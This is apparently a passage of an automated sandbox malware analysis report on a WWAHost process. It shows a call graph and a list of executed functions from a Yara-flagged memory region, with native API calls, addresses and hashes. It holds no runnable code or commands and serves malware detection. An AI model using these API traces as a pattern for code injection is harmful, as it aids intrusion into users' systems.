31800 293ac5c 31799->31800 31801 293d3d0 2 API calls 31799->31801 31932 2947f90 31800->31932 31801->31800 31804 293ad86 31949 293aba0 LdrLoadDll LdrInitializeThunk 31804->31949 31805 2948180 2 API calls 31806 293acda 31805->31806 31806->31804 31811 293ace6 31806->31811 31808 293ada5 31809 293adad 31808->31809 31950 293ab10 LdrLoadDll NtClose LdrInitializeThunk 31808->31950 31812 2948710 2 API calls 31809->31812 31810 293ad2f 31816 2948710 2 API calls 31810->31816 31811->31810 31814 2948290 2 API calls 31811->31814 31811->31841 31815 293adb7 31812->31815 31814->31810 31815->31724 31818 293ad4c 31816->31818 31817 293adcf 31817->31809 31819 293add6 31817->31819 31936 29475b0 31818->31936 31821 293adee 31819->31821 31951 293aa90 LdrLoadDll LdrInitializeThunk 31819->31951 31952 2948010 LdrLoadDll 31821->31952 31823 293ad63 31823->31841 31939 2937280 31823->31939 31825 293ae02 31953 293a910 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31825->31953 31828 293ae26 31830 293ae73 31828->31830 31954 2948040 LdrLoadDll 31828->31954 31956 29480a0 LdrLoadDll 31830->31956 31833 293ae44 31833->31830 31955 29480d0 LdrLoadDll 31833->31955 31834 293ae81 31835 2948710 2 API calls 31834->31835 31836 293ae8b 31835->31836 31837 2948710 2 API calls 31836->31837 31839 293ae95 31837->31839 31840 2937280 3 API calls 31839->31840 31839->31841 31840->31841 31841->31724 31843 293d3e3 31842->31843 32027 2948110 31843->32027 31846->31724 31848 293d21d 31847->31848 31854 2948240 31848->31854 31851 293d265 31851->31786 31855 294825c 31854->31855 31856 29491e0 LdrLoadDll 31854->31856 31864 37599a0 LdrInitializeThunk 31855->31864 31856->31855 31857 293d25e 31857->31851 31859 2948290 31857->31859 31860 29491e0 LdrLoadDll 31859->31860 31861 29482ac 31860->31861 31865 3759780 LdrInitializeThunk 31861->31865 31862 293d28e 31862->31786 31864->31857 31865->31862 31867 294a270 2 API calls 31866->31867 31868 2947b17 31867->31868 31887 2938160 31868->31887 31870 2947b32 31871 2947b70 31870->31871 31872 2947b59 31870->31872 31875 294a020 2 API calls 31871->31875 31873 294a0a0 2 API calls 31872->31873 31874 2947b66 31873->31874 31874->31789 31876 2947baa 31875->31876 31877 294a020 2 API calls 31876->31877 31878 2947bc3 31877->31878 31884 2947e64 31878->31884 31893 294a060 LdrLoadDll 31878->31893 31880 2947e49 31881 2947e50 31880->31881 31880->31884 31882 294a0a0 2 API calls 31881->31882 31883 2947e5a 31882->31883 31883->31789 31885 294a0a0 2 API calls 31884->31885 31886 2947eb9 31885->31886 31886->31789 31888 2938185 31887->31888 31889 2939b40 LdrLoadDll 31888->31889 31890 29381b8 31889->31890 31892 29381dd 31890->31892 31894 293b340 31890->31894 31892->31870 31893->31880 31895 293b36c 31894->31895 31896 2948460 LdrLoadDll 31895->31896 31897 293b385 31896->31897 31898 293b38c 31897->31898 31905 29484a0 31897->31905 31898->31892 31902 293b3c7 31903 2948710 2 API calls 31902->31903 31904 293b3ea 31903->31904 31904->31892 31906 29491e0 LdrLoadDll 31905->31906 31907 29484bc 31906->31907 31913 3759710 LdrInitializeThunk 31907->31913 31908 293b3af 31908->31898 31910 2948a90 31908->31910 31911 29491e0 LdrLoadDll 31910->31911 31912 2948aaf 31911->31912 31912->31902 31913->31908 31957 293bdb0 31914->31957 31916 293ccd7 31917 293ccf0 31916->31917 31970 2933d70 31916->31970 31919 294a270 2 API calls 31917->31919 31921 293ccfe 31919->31921 31920 293ccea 31994 2947430 31920->31994 31921->31793 31925 293863b 31923->31925 31924 293875b 31924->31797 31925->31924 31926 293d080 3 API calls 31925->31926 31927 293873c 31926->31927 31928 293876a 31927->31928 31929 2938751 31927->31929 31930 2948710 2 API calls 31927->31930 31928->31797 32026 2935ea0 LdrLoadDll 31929->32026 31930->31929 31933 2947f9c 31932->31933 31934 29491e0 LdrLoadDll 31933->31934 31935 293acb0 31934->31935 31935->31804 31935->31805 31935->31841 31937 293d3d0 2 API calls 31936->31937 31938 29475e2 31937->31938 31938->31823 31940 2937298 31939->31940 31941 2939b40 LdrLoadDll 31940->31941 31942 29372b3 31941->31942 31943 2943e50 LdrLoadDll 31942->31943 31944 29372c3 31943->31944 31945 29372fd 31944->31945 31946 29372cc PostThreadMessageW 31944->31946 31945->31724 31946->31945 31947 29372e0 31946->31947 31948 29372ea PostThreadMessageW 31947->31948 31948->31945 31949->31808 31950->31817 31951->31821 31952->31825 31953->31828 31954->31833 31955->31830 31956->31834 31958 293bde3 31957->31958 31999 293a150 31958->31999 31960 293bdf5 32003 293a2c0 31960->32003 31962 293be13 31963 293a2c0 LdrLoadDll 31962->31963 31964 293be29 31963->31964 31965 293d200 3 API calls 31964->31965 31967 293be4d 31965->31967 31966 293be54 31966->31916 31967->31966 31968 294a2b0 2 API calls 31967->31968 31969 293be64 31968->31969 31969->31916 31971 2933d96 31970->31971 31972 293b340 3 API calls 31971->31972 31974 2933e61 31972->31974 31973 2933e68 31973->31920 31974->31973 32006 294a2f0 31974->32006 31976 2933ec9 31977 2939e90 LdrLoadDll 31976->31977 31978 2933fd3 31977->31978 31979 2939e90 LdrLoadDll 31978->31979 31980 2933ff7 31979->31980 32010 293b400 31980->32010 31984 2934083 31985 294a020 2 API calls 31984->31985 31986 2934110 31985->31986 31987 294a020 2 API calls 31986->31987 31989 293412a 31987->31989 31988 29342a6 31988->31920 31989->31988 31990 2939e90 LdrLoadDll 31989->31990 31991 293416a 31990->31991 31992 2939d60 LdrLoadDll 31991->31992 31993 293420a 31992->31993 31993->31920 31995 2943e50 LdrLoadDll 31994->31995 31996 2947451 31995->31996 31997 2947477 31996->31997 31998 2947464 CreateThread 31996->31998 31997->31917 31998->31917 32000 293a177 31999->32000 32001 2939e90 LdrLoadDll 32000->32001 32002 293a1b3 32001->32002 32002->31960 32004 2939e90 LdrLoadDll 32003->32004 32005 293a2d9 32003->32005 32004->32005 32005->31962 32007 294a2fd 32006->32007 32008 2943e50 LdrLoadDll 32007->32008 32009 294a310 32008->32009 32009->31976 32011 293b425 32010->32011 32019 2948310 32011->32019 32014 29483a0 32015 29491e0 LdrLoadDll 32014->32015 32016 29483bc 32015->32016 32025 3759650 LdrInitializeThunk 32016->32025 32017 29483db 32017->31984 32020 29491e0 LdrLoadDll 32019->32020 32021 294832c 32020->32021 32024 37596d0 LdrInitializeThunk 32021->32024 32022 293405c 32022->31984 32022->32014 32024->32022 32025->32017 32026->31924 32028 29491e0 LdrLoadDll 32027->32028 32029 294812c 32028->32029 32032 3759840 LdrInitializeThunk 32029->32032 32030 293d40e 32030->31724 32032->32030

                                                  Executed Functions

                                                  Function 029485E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 260 29485e0-2948631 call 29491e0 NtCreateFile
                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,02943BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02943BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0294862D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_2930000_WWAHost.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID: .z`
                                                  • API String ID: 823142352-1441809116
                                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                  • Instruction ID: 25262b455812b0eaf0355e8af0d26fc34feae6c575fedb266ff0cabb1d6ff2d5
                                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                  • Instruction Fuzzy Hash: E3F0B2B2204208ABCB08CF88DC84EEB77ADAF8C754F158248FA0D97240C630E811CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0294868A Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 511 294868a-29486a6 512 29486ac-29486d9 NtReadFile 511->512 513 29486a7 call 29491e0 511->513 513->512
                                                  APIs
                                                  • NtReadFile.NTDLL(02943D72,5E972F65,FFFFFFFF,02943A31,?,?,02943D72,?,02943A31,FFFFFFFF,5E972F65,02943D72,?,00000000), ref: 029486D5
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_2930000_WWAHost.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: e0d2451ba9be44db18ec752e88896d3cc94604dd402038d75f90d12682796174
                                                  • Instruction ID: 00c4c6a627f7ccf1db4c2ce87da12a02b9e59f01959832df7071e85cd14fde2d
                                                  • Opcode Fuzzy Hash: e0d2451ba9be44db18ec752e88896d3cc94604dd402038d75f90d12682796174
                                                  • Instruction Fuzzy Hash: 86F0F4B6210108AFDB14DF89DC84EEB77A9FF8C754F118249FA1DA7241D630E911CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02948690 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtReadFile.NTDLL(02943D72,5E972F65,FFFFFFFF,02943A31,?,?,02943D72,?,02943A31,FFFFFFFF,5E972F65,02943D72,?,00000000), ref: 029486D5
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_2930000_WWAHost.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                  • Instruction ID: 3c440f5bb57a9da09af04404d620a57fa3015cdb96a012bcfced6e0ba6a51525
                                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                  • Instruction Fuzzy Hash: 38F0A4B2200208ABDB14DF89DC84EEB77ADAF8C754F158248BA1D97241DA30E911CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 029487C0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02932D11,00002000,00003000,00000004), ref: 029487F9
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_2930000_WWAHost.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                  • Instruction ID: addfb0be4dd1a44c62ce3cfa819184ee6eb68452c0e26fe261c9dae3f65b262c
                                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                  • Instruction Fuzzy Hash: E1F015B2200208ABDB14DF89CC80EAB77ADAF8C750F118148FE0897241C630F910CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0294870A Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtClose.NTDLL(02943D50,?,?,02943D50,00000000,FFFFFFFF), ref: 02948735
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_2930000_WWAHost.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: c2319470a3e0b9dbf7403b959949c8152fdd32da2946de2530810f9bfa99bc0c
                                                  • Instruction ID: 859cd88182595768e4ab74daea7f16fb6dd156d1f32825e6d21ff442aea6a71d
                                                  • Opcode Fuzzy Hash: c2319470a3e0b9dbf7403b959949c8152fdd32da2946de2530810f9bfa99bc0c
                                                  • Instruction Fuzzy Hash: 1EE0C2763082107BE710DBA4CC48FD77F29EF48350F1444A8F94C9B241C630E600CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02948710 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtClose.NTDLL(02943D50,?,?,02943D50,00000000,FFFFFFFF), ref: 02948735
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517343722.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_2930000_WWAHost.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                  • Instruction ID: ac66f7d09b2b0832023eaa426dea3e6f5d66036d8954310a4e367b7f0c242d90
                                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                  • Instruction Fuzzy Hash: 62D012752002146BD710EB98CC45E97775DEF48750F154455BA185B241C530F600C7E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 03759A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517693676.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true
                                                  • Associated: 00000010.00000002.517931884.000000000380B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.517941262.000000000380F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_36f0000_WWAHost.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 99be154bdebeb53c132a6f5a5db4b6b95a113a29ea70626cdab1199cc9fd7abe
                                                  • Instruction ID: 0b9d1e64fcf88c76514d831c9e4d0f36f6af2cdf2fc1bdce64357a0f8b2fad6f
                                                  • Opcode Fuzzy Hash: 99be154bdebeb53c132a6f5a5db4b6b95a113a29ea70626cdab1199cc9fd7abe
                                                  • Instruction Fuzzy Hash: 9490026132184846E210A56A4C24B07004597D4343F51C125A4144554CCE5588617561
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 03759910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517693676.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true
                                                  • Associated: 00000010.00000002.517931884.000000000380B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.517941262.000000000380F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_36f0000_WWAHost.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 8c97e5732e16afe3516baa80c671c07248bc6f44cd63fbee0898ae065fe47610
                                                  • Instruction ID: 3bc50bab33de2afc71780a0382e526a9149a6b08a944ac84c4339665963b8fa7
                                                  • Opcode Fuzzy Hash: 8c97e5732e16afe3516baa80c671c07248bc6f44cd63fbee0898ae065fe47610
                                                  • Instruction Fuzzy Hash: 4B9002B131104C06E150B15A4414746004597D4341F51C021A9054554E8B998DD576A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 037599A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517693676.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true
                                                  • Associated: 00000010.00000002.517931884.000000000380B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.517941262.000000000380F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_36f0000_WWAHost.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: f1f04a03941bcc4027e3d6f301289b19764ac2e0a963a6146edb644a53d12f69
                                                  • Instruction ID: 7d8d6721549ee7d9523a88bd37865b980559be816b47d48204c5c3a07ee476bd
                                                  • Opcode Fuzzy Hash: f1f04a03941bcc4027e3d6f301289b19764ac2e0a963a6146edb644a53d12f69
                                                  • Instruction Fuzzy Hash: 379002A135104C46E110A15A4424B060045D7E5341F51C025E5054554D8B59CC527166
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 03759860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517693676.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true
                                                  • Associated: 00000010.00000002.517931884.000000000380B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.517941262.000000000380F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_36f0000_WWAHost.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 2c08aaecba17132c094e2f20842a63b09d7ea1f05c4c8749052194fe0dd6bbcb
                                                  • Instruction ID: 47d406771d58ac256c24d2b1157f4c93a15902b71a843278a402b9bd7bb22354
                                                  • Opcode Fuzzy Hash: 2c08aaecba17132c094e2f20842a63b09d7ea1f05c4c8749052194fe0dd6bbcb
                                                  • Instruction Fuzzy Hash: F590027131104C17E121A15A4514707004997D4281F91C422A4414558D9B968952B161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 03759840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517693676.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true
                                                  • Associated: 00000010.00000002.517931884.000000000380B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.517941262.000000000380F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_36f0000_WWAHost.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: f2b0aca876cf5249c39bdfbec1ff6d66d47749ffc79f04c75dffbc936577bb0a
                                                  • Instruction ID: 14f6b415d84739807130a0ff3e01726690c39cbba145d46a4f57b0b072d9a700
                                                  • Opcode Fuzzy Hash: f2b0aca876cf5249c39bdfbec1ff6d66d47749ffc79f04c75dffbc936577bb0a
                                                  • Instruction Fuzzy Hash: 42900261352089566555F15A44145074046A7E4281791C022A5404950C8A669856F661
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 03759710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517693676.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true
                                                  • Associated: 00000010.00000002.517931884.000000000380B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.517941262.000000000380F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_36f0000_WWAHost.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: eaae9ff500598c555b1e6a58e42a1272d5d6e803cbb1c50ad37d90947e7273d8
                                                  • Instruction ID: 2a24bdf7fea61444264777ac52e3d622e510c323fcd4c97a392cca305236e20b
                                                  • Opcode Fuzzy Hash: eaae9ff500598c555b1e6a58e42a1272d5d6e803cbb1c50ad37d90947e7273d8
                                                  • Instruction Fuzzy Hash: 8F90027131104C06E110A59A5418646004597E4341F51D021A9014555ECBA588917171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 03759FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517693676.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true
                                                  • Associated: 00000010.00000002.517931884.000000000380B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.517941262.000000000380F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_36f0000_WWAHost.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 3ea1b6c269e67b7424d0680b44a14a140bbc9b68f5f359e7443921542d17991d
                                                  • Instruction ID: 951244609dfabead26ae9d8497ee311f699ca72dda08dcc8174f98905259da08
                                                  • Opcode Fuzzy Hash: 3ea1b6c269e67b7424d0680b44a14a140bbc9b68f5f359e7443921542d17991d
                                                  • Instruction Fuzzy Hash: E090027132118C06E120A15A8414706004597D5241F51C421A4814558D8BD588917162
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 03759780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517693676.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true
                                                  • Associated: 00000010.00000002.517931884.000000000380B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.517941262.000000000380F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_36f0000_WWAHost.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a442ee218c761ae66533ac9139ac7a83e63ca5122d6273fd876296fb84b7d491
                                                  • Instruction ID: 7183cf44f6624221d3c581cbed6965726a11bf101b95a93deec0f4c4eb9123ef
                                                  • Opcode Fuzzy Hash: a442ee218c761ae66533ac9139ac7a83e63ca5122d6273fd876296fb84b7d491
                                                  • Instruction Fuzzy Hash: B490026932304806E190B15A541860A004597D5242F91D425A4005558CCE5588697361
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 03759660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517693676.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true
                                                  • Associated: 00000010.00000002.517931884.000000000380B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.517941262.000000000380F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_36f0000_WWAHost.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 3a0018efd5bf19b2ca14fe072a904c3c453c3e4a436b30355a81446d90f4e98c
                                                  • Instruction ID: 507591acf32b7f9becaca15c5d63e90ecb4380d3997096a75078bf2d741ed9e2
                                                  • Opcode Fuzzy Hash: 3a0018efd5bf19b2ca14fe072a904c3c453c3e4a436b30355a81446d90f4e98c
                                                  • Instruction Fuzzy Hash: 4C90027131104C06E190B15A441464A004597D5341F91C025A4015654DCF558A5977E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 03759650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517693676.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true
                                                  • Associated: 00000010.00000002.517931884.000000000380B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.517941262.000000000380F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_36f0000_WWAHost.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 1aa1acc36c40a712c97021db8a53287d4eafcf89b4225b60f9c402403986e4e3
                                                  • Instruction ID: 0c1e606460b0607bae671412410bd1c346768bd33e8681deddafa83f940fd83e
                                                  • Opcode Fuzzy Hash: 1aa1acc36c40a712c97021db8a53287d4eafcf89b4225b60f9c402403986e4e3
                                                  • Instruction Fuzzy Hash: 8990027131508C46E150B15A4414A46005597D4345F51C021A4054694D9B658D55B6A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 037596E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517693676.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true
                                                  • Associated: 00000010.00000002.517931884.000000000380B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.517941262.000000000380F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_36f0000_WWAHost.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 1247c256e6f1e66dbf493bb51c304e5c5bde857c55e3ae273db40dbfdd3325c9
                                                  • Instruction ID: 387ed555abc394f4f6e99374e53d5f25d6ee3631633b222065c9a91774276891
                                                  • Opcode Fuzzy Hash: 1247c256e6f1e66dbf493bb51c304e5c5bde857c55e3ae273db40dbfdd3325c9
                                                  • Instruction Fuzzy Hash: 939002713110CC06E120A15A841474A004597D4341F55C421A8414658D8BD588917161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 037596D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517693676.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true
                                                  • Associated: 00000010.00000002.517931884.000000000380B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.517941262.000000000380F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_36f0000_WWAHost.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: e33ccb30acac805908ec7dcb85203dff15ed0e28ec15c88ac776e4e7d2c98a24
                                                  • Instruction ID: 36e66db7d64a402afae3b2bb8465b7eba8dcc7b55de7ba37e9ac75d3a406f7e7
                                                  • Opcode Fuzzy Hash: e33ccb30acac805908ec7dcb85203dff15ed0e28ec15c88ac776e4e7d2c98a24
                                                  • Instruction Fuzzy Hash: 2590027131104C46E110A15A4414B46004597E4341F51C026A4114654D8B55C8517561
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 03759540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.517693676.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: true
                                                  • Associated: 00000010.00000002.517931884.000000000380B000.00000040.00000800.00020000.00000000.sdmpDownload File
